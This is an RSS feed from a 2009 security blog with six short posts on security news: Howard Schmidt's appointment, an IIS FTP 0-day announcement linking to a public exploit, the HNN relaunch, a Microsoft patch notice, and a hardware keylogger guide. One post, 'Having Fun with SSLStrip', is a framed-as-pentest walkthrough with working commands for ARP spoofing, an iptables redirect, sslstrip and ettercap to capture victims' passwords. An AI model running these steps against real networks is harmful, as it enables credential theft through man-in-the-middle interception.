<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SecurityWire Blog &#187; Security News</title>
	<atom:link href="http://blog.securitywire.com/category/security-news/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.securitywire.com</link>
	<description>Computer and Network Security, Penetration Testing, Vulnerability Research, Cryptography and more!</description>
	<lastBuildDate>Mon, 11 Jan 2010 03:54:54 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Howard Schmidt as cybersecurity coordinator</title>
		<link>http://blog.securitywire.com/2009/12/24/howard-schmidt-as-cybersecurity-coordinator/</link>
		<comments>http://blog.securitywire.com/2009/12/24/howard-schmidt-as-cybersecurity-coordinator/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 05:47:07 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=104</guid>
		<description><![CDATA[Howard Schmidt as cybersecurity coordinator]]></description>
			<content:encoded><![CDATA[<p>There has been a lot of chatter around Howard Schmidt being picked as cybersecurity &#8220;czar&#8221; at the White House this week and I just wanted to throw my two cents in. I recently had the opportunity to hear Mr. Schmidt speak at the Central Ohio InfoSec Summit 2009 and I can attest that Howard is a very sharp guy. I believe Mr. Schmidt possesses both the business and technical skills required for his new high-level position at the White House. Howard has demonstrated a deep understanding of both the business and technical issues surrounding information security, and I am looking forward to seeing the changes he will introduce in the next few years. To put it simply, Howard is a security geek with an acute business sense.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/12/24/howard-schmidt-as-cybersecurity-coordinator/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Having Fun with SSLStrip</title>
		<link>http://blog.securitywire.com/2009/11/25/having-fun-with-sslstrip/</link>
		<comments>http://blog.securitywire.com/2009/11/25/having-fun-with-sslstrip/#comments</comments>
		<pubDate>Thu, 26 Nov 2009 03:43:44 +0000</pubDate>
		<dc:creator>ospf5</dc:creator>
				<category><![CDATA[Security News]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=99</guid>
		<description><![CDATA[Intro
Ettercap was a very nice and easy way to sniff passwords and it still is for the most part. A recent issue has been the fact that the popular browsers have made their warnings about SSL certificates a little more scary. The old warnings looked harmless, the sheep would just click yes and the wolf [...]]]></description>
			<content:encoded><![CDATA[<p>Intro</p>
<p>Ettercap was a very nice and easy way to sniff passwords and it still is for the most part. A recent issue has been the fact that the popular browsers have made their warnings about SSL certificates a little more scary. The old warnings looked harmless, the sheep would just click yes and the wolf would then have access to their PayPal account. The newer warnings are a little more scary but from what I&#8217;ve seen aren&#8217;t much of a deterrent to the clicktards out there; it will be rare that they know they&#8217;re being sniffed. When doing a pentest we want passwords of the network administrators, not of the lowly sheep. Most network admins are at least a little security aware.<br />
Problem: Newer versions of popular web browsers have better warnings for SSL certificate errors. This helps advanced users become aware that there may be a MITM attack going on. Most &#8220;clicktards&#8221; will ignore these warnings anyway and relinquish their logons to you but we want Network Admin passwords in our pentest.</p>
<p>Solution: Use SSL Strip. This will strip off all SSL information and pass the page to the victim as HTTP not HTTPS so no warning and only the most astute and paranoid users will notice this.</p>
<p>My lab is as follows. BackTrack 4 live and a windows XP machine which will be my victim.</p>
<p>Here is what I did step by step in BT4 Live boot to get this to work.</p>
<p>1. Start networking on BT4</p>
<p> /etc/init.d/networking start</p>
<p>2. Enable IPv4 forwarding</p>
<p> echo "1" &gt; /proc/sys/net/ipv4/ip_forward</p>
<p>3. Create an iptables rule to forward traffic destined for port 80 to the port used by sslstrip, which is 10000 by default<br />
 <br />
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000</p>
<p>4. Now we need to start arpspoof to poison the victim&#8217;s ARP table<br />
 <br />
 arpspoof -i eth0 -t &lt;Victims IP Address&gt; &lt;The Gateways IP Address&gt;</p>
<p>5. Now we start sslstrip with the -a switch<br />
 <br />
 sslstrip -a</p>
<p>6. Next we need to start ettercap<br />
 <br />
 ettercap -T -q -i eth0</p>
<p>7. Wait for someone to log on and grab their password!!</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/11/25/having-fun-with-sslstrip/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>IIS FTP remote stack overflow 0-day</title>
		<link>http://blog.securitywire.com/2009/08/31/iis-ftp-remote-buffer-overflow-0-day/</link>
		<comments>http://blog.securitywire.com/2009/08/31/iis-ftp-remote-buffer-overflow-0-day/#comments</comments>
		<pubDate>Mon, 31 Aug 2009 20:42:43 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[IIS]]></category>
		<category><![CDATA[metasploit]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=82</guid>
		<description><![CDATA[A new 0-day exploit has been posted on milw0rm at http://milw0rm.com/exploits/9541 The new 0-day is for Microsoft IIS 5&#8217;s (Windows 2000) FTP service. It is also claimed to work on IIS 6 (Windows 2003) with stack cookie protection enabled. Metasploit development is already underway to integrate this new exploit.
]]></description>
			<content:encoded><![CDATA[<p>A new 0-day exploit has been posted on milw0rm at <a title="IIS 5 and 6 FTP exploit" href="http://milw0rm.com/exploits/9541" target="_blank">http://milw0rm.com/exploits/9541</a> The new 0-day is for Microsoft IIS 5&#8217;s (Windows 2000) FTP service. It is also claimed to work on IIS 6 (Windows 2003) with stack cookie protection enabled. Metasploit development is already underway to integrate this new exploit.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/08/31/iis-ftp-remote-buffer-overflow-0-day/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HNN The Hacker News Network</title>
		<link>http://blog.securitywire.com/2009/07/25/hnn-the-hacker-news-network/</link>
		<comments>http://blog.securitywire.com/2009/07/25/hnn-the-hacker-news-network/#comments</comments>
		<pubDate>Sat, 25 Jul 2009 04:55:27 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=54</guid>
		<description><![CDATA[If you have been around the security scene for a while then you should well remember HNN, the Hacker News Network, and Space Rogue from L0pht Heavy Industries. After quite a few years of down time, it looks like Space Rogue now has a new video newscast for this week and is planning for [...]]]></description>
			<content:encoded><![CDATA[<p>If you have been around the security scene for a while then you should well remember HNN, the Hacker News Network, and Space Rogue from L0pht Heavy Industries. After quite a few years of down time, it looks like Space Rogue now has a new video newscast for this week and is planning for a full launch on 01/11/10. HNN was always a good source of the latest news in the security world and it will be quite refreshing to see what they have in store for us this time around! The new video format for HNN should be interesting. Check out their web site and be ready for the return!</p>
<p><a href="http://www.hackernews.com/">The Hacker News Network</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/07/25/hnn-the-hacker-news-network/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IE and Visual Studio out of band patch from Microsoft next Tuesday</title>
		<link>http://blog.securitywire.com/2009/07/24/ie-and-visual-studio-out-of-band-patch-from-microsoft-next-tuesday/</link>
		<comments>http://blog.securitywire.com/2009/07/24/ie-and-visual-studio-out-of-band-patch-from-microsoft-next-tuesday/#comments</comments>
		<pubDate>Sat, 25 Jul 2009 03:34:20 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Security News]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=52</guid>
		<description><![CDATA[Out of band release from Microsoft coming next Tuesday for Visual Studio with extra protection of the source issue in IE. They will be patching a few critical extra holes in IE at the same time. No details yet as to what issues are going to be patched. Most likely they will be significant and [...]]]></description>
			<content:encoded><![CDATA[<p>Out of band release from Microsoft coming next Tuesday for Visual Studio with extra protection of the source issue in IE. They will be patching a few critical extra holes in IE at the same time. No details yet as to what issues are going to be patched. Most likely they will be significant and possibly already being exploited, since Microsoft has not been deviating much from their Patch Tuesday schedule recently. They hint that customers that are already up to date with security updates are not vulnerable to known attacks, so this could be more about fixing the source of a known issue to prevent exploitation from other attack vectors. The bulletin points out that developers will have to keep an eye out for any applications that use this vulnerable functionality and take action to mitigate this risk.</p>
<p>Keep an eye on the bulletin at: <a href="http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx" target="_blank">http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/07/24/ie-and-visual-studio-out-of-band-patch-from-microsoft-next-tuesday/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>KeeLog &#8211; DIY hardware PS/2 wireless keylogger</title>
		<link>http://blog.securitywire.com/2009/07/19/keelog-diy-hardware-ps2-wireless-keylogger/</link>
		<comments>http://blog.securitywire.com/2009/07/19/keelog-diy-hardware-ps2-wireless-keylogger/#comments</comments>
		<pubDate>Sun, 19 Jul 2009 04:17:41 +0000</pubDate>
		<dc:creator>merc</dc:creator>
				<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[Keylogging]]></category>

		<guid isPermaLink="false">http://blog.securitywire.com/?p=28</guid>
		<description><![CDATA[KeeLog has a nice online article on how to build a hardware PS/2 wireless keylogger. Sounds like a fun project and maybe someday I&#8217;ll have time to tackle it. The article comes with full instructions on how to build the transmitter and receiver. They also include a Windows driver to make the receiver act as a [...]]]></description>
			<content:encoded><![CDATA[<p>KeeLog has a <a title="Wireless Keylogger" href="http://www.keelog.com/wireless_keylogger.html" target="_blank">nice online article</a> on how to build a hardware PS/2 wireless keylogger. Sounds like a fun project and maybe someday I&#8217;ll have time to tackle it. The article comes with full instructions on how to build the transmitter and receiver. They also include a Windows driver to make the receiver act as a virtual COM port so data can be monitored using any standard terminal application that supports serial ports.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.securitywire.com/2009/07/19/keelog-diy-hardware-ps2-wireless-keylogger/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
